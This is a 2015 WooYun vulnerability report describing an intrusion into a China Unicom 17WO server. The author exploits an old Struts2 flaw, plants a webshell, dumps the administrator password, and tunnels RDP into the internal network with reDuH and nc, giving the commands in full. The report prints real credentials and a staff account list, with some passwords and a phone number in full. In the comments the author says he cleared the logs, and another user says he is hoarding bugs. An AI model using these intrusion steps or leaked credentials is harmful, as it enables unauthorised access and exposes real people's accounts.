当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109417

漏洞标题:看我如何进入17WO网站某后台并且拿下内网服务器

相关厂商:中国联通

漏洞作者: 金枪银矛小霸王

提交时间:2015-04-21 14:02

修复时间:2015-06-08 13:56

公开时间:2015-06-08 13:56

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-05-04: 细节向核心白帽子及相关领域专家公开
2015-05-14: 细节向普通白帽子公开
2015-05-24: 细节向实习白帽子公开
2015-06-08: 细节向公众公开

简要描述:

感谢 @scanf 兄弟。

详细说明:

说来也巧合的,你们联通一条短信就让我进去服务器。
一开始一条短信飞过来了

IMG_0385.PNG


唔~ 访问下。一眼过去感觉有Struts2漏洞,可惜主站没有,搜下二级域名
然后发现了这个

http://value.17wo.cn/resource/value17wo/LoginForm.action


L3Y@KO6XKN[OW1GOWCVMM1F.jpg


检测下。唔~这么老的洞还存在 struts2 05的

DADZ{CN@7~`)GCZSCCM~VT4.jpg


直接上传一句话,菜刀拿shell

A{KUD2@@YY(J{[C_{6LMCHF.jpg


查看下ip。原来是内网

Ethernet adapter 本地连接 2:
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 10.123.177.41
   Subnet Mask . . . . . . . . . . . : 255.255.255.224
   Default Gateway . . . . . . . . . : 10.123.177.35


然后使用getpass.exe获取到管理员的账号密码

UserName: Administrator
LogonDomain: WINCENTER
password: wincenter


尝试用lcx.exe进行转发,但是失败了。@scanf 发了我一个工具 reDuH ,不错
开始GUI一连就崩,然后改用jar包进行转发,用nc进行监听
上传xx.jsp转发文件

http://value.17wo.cn/Form/css/xx.jsp


本地执行执行java命令

>java -jar reduh.jar http://value.17wo.cn/Form/css/xx.jsp


再开启nc监听1010端口

nc -vv localhost 1010


再输入

[createTunnel]1234:127.0.0.1:3389


帮内网服务器的3389经过1010端口转发到1234端口
本机mstsc连接输入127.0.0.1:1234即可连入

315%B~`0T9{]T[)KWPWRAT9.jpg


一连撸了几天,本来打算把整个段入侵的,谁知道你们服务器不给力。一扫就宕机了。。
在桌面找到一份文件

"ID","USERNAME","PASSWORD","PHONE_NUMBER","NAME_CHS"
"41","ouyangxp","oy****","186**30233",""
"1","mlabs","Lihan****","18**31399","李韩"
"2","wangliang","wl****","","汪亮"
"3","wuyong","w***","1856**0415","吴勇"
"4","wenhui","wh1234","185***0410","文慧"
"5","dengrenguang","drg1234","185**0403","邓仁光"
"6","liyiling","l*****","1**555083","李艺玲"
"7","wujie","w*****","1852**5098","武杰"
"8","youjia","*****","1867**75","游嘉"
"9","zhangjunwei","z*****","18**4826227","张俊伟"
"10","hepeng","h********","1862**","何鹏"
"11","zhengwenqing","z***","","郑文清"
"12","zy","z***23**4","18***0498","zy"
"13","zhouqunjie","z*****4","1856**0498","周群杰"
"14","lihan","lh***4","18602***31399","李韩"
"15","fanronghui","frh****4","186**30278","范荣辉"
"16","kanglisheng","k****34","186***40","康立升"
"17","caibingfeng","cb*****","1316**0646","蔡炳锋"
"18","luojianxiong","l*****4","18666**048","罗剑雄"
"19","chenfangling","c****23*4","1862**49","陈芳玲"
"20","demo","un*****","",""
"21","jiangtao","*jt****","18602031756","江涛"
"22","caizhaochun","c****","","蔡召春"
"23","liuzhengbiao","lz****","","刘正标"
"24","wangshuai","ws****","","王帅"
"25","xuzhongbin","x****","","徐忠斌"
"26","zhengsi","zs1***4","","郑斯"
"27","longzhiyong","lz****234","","龙智勇"
"28","hexin","hx*****4","","何信"
"29","cuidongping","cdp1234","","崔东平"
"30","linmin","l*****4","","林敏"
"31","weierxi","w******34","","魏尔希"
"32","wangguanghao","w***g*****4","","王光昊"
"33","lihaiqi","l****","","李海琦"
"34","zouwenbin","zw*****4","","邹文斌"
"35","liudexiang","*******4","","刘德翔"
"36","xuwei","******4","","徐玮"
"37","wuhaixi","w********","","吴海西"
"38","chenchaowei","cc*****","","陈超巍"
"39","sumaojin","sm*****4","15*****1728",""
"40","fengyongxiong","f****34","1860******81",""


就这样你们懂的

漏洞证明:

315%B~`0T9{]T[)KWPWRAT9.jpg

修复方案:

升级

版权声明:转载请注明来源 金枪银矛小霸王@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-04-24 13:54

厂商回复:

CNVD未复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无

漏洞评价:

评论

  1. 2015-04-21 14:30 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    加油小伙子

  2. 2015-04-21 14:45 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    金枪银矛小霸王

  3. 2015-04-21 15:07 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    加油小伙子

  4. 2015-04-21 15:08 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    发现他们会看日志的!漏洞不能存!

  5. 2015-04-21 15:18 | 金枪银矛小霸王 ( 普通白帽子 | Rank:103 漏洞数:25 | 不会挖洞洞的猿猿不是好学生)

    @刘海哥 我清了日志

  6. 2015-04-21 15:18 | 金枪银矛小霸王 ( 普通白帽子 | Rank:103 漏洞数:25 | 不会挖洞洞的猿猿不是好学生)

    @scanf 唔~不加油也不行了

  7. 2015-04-21 18:08 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    @金枪银矛小霸王 ...我藏了4 5个问题...短信接口任意内容...过几天就挂了!

  8. 2015-04-21 21:02 | VirGo ( 路人 | Rank:8 漏洞数:1 | 妹子,我需要更多的妹子)

    @金枪银矛小霸王 这么快就进入到内网服务器了啊!